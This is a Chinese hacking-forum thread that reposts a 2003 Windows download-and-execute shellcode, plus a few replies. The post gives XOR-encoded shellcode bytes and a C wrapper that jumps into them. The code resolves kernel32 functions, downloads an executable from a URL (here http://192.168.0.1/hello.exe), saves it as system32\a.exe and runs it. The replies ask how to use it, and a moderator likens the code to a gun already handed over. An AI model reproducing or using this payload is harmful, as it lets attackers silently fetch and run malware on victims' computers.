论坛: 黑客进阶 标题: Shellcodefordownloadexefromwebsiteandexecute(转) 复制本贴地址    
作者: TomyChen [quest]    版主   登录
*---------------------------------------------------------------
Shellcode for download exe from web site and execute 
Author : ey4s
Version: 1.0
Created: 2003-07-31
Modifed: 2003-08-01
Notes:
1)从PEB中获取kernel32.dll的起始地址;
2)从内存中搜索GetProcAddress地址;
3)调用函数urlmon.dll!URLDownloadToFileA从web server下载exe;
  这个方法是从ThreaT的shellcode中copy来的,这个函数真方便:)
4)下载后的文件保存为system32\a.exe并调用WinExec运行;
5)url串以0x80为结束标记,url串可以任意更改;

适用平台:
windows 2000 and windows xp

参考资料
<>http://packetstormsecurity.nl/0304-exploits/regexploit.c by ThreaT
---------------------------------------------------------------*/
#include <windows.h>
//336 bytes + url_len
unsigned char sc_down_exec[]=
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x4D\x99\x99\x99\xC3\x21\x95\x69"
"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
"\x97\x12\x49\xF3\x9D\xC0\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF"
"\x66\xCE\x65\xC3\x12\x41\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F"
"\x8A\xCF\xDF\x19\xA7\x19\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12"
"\x45\xF3\xB9\xCA\x66\xCE\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD"
"\x9A\x9D\xE1\xFC\x99\x99\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65"
"\x12\x45\xC9\xCA\x66\xCE\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59"
"\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A"
"\x71\xBE\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB"
"\xFC\xEA\xEA\x99\xDE\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB"
"\xFC\xFA\xED\xF6\xEB\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99"
"\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD"
"\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99"
"\xCC\xCB\xD5\xDD\xF6\xEE\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5"
"\xFC\xD8\x99"
"http://192.168.0.1/hello.exe\x80";
void main()
{
    __asm
    {
        lea    eax,sc_down_exec
        jmp    eax
    }
}

========================================
本来想加点废话的,可是看到作者该说的都说了,那大家就看吧

地主 发表时间: 08/04 11:54

回复: allyesno [allyesno]   论坛用户   登录
利用的方法?

B1层 发表时间: 08/04 14:56

回复: keke [keke1]   论坛用户   登录
不知道!~!!和你一起等

B2层 发表时间: 08/06 15:16

回复: 286 [unique]   版主   登录
KAO,枪都给你了,你却问怎么开?

B3层 发表时间: 08/18 14:39

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号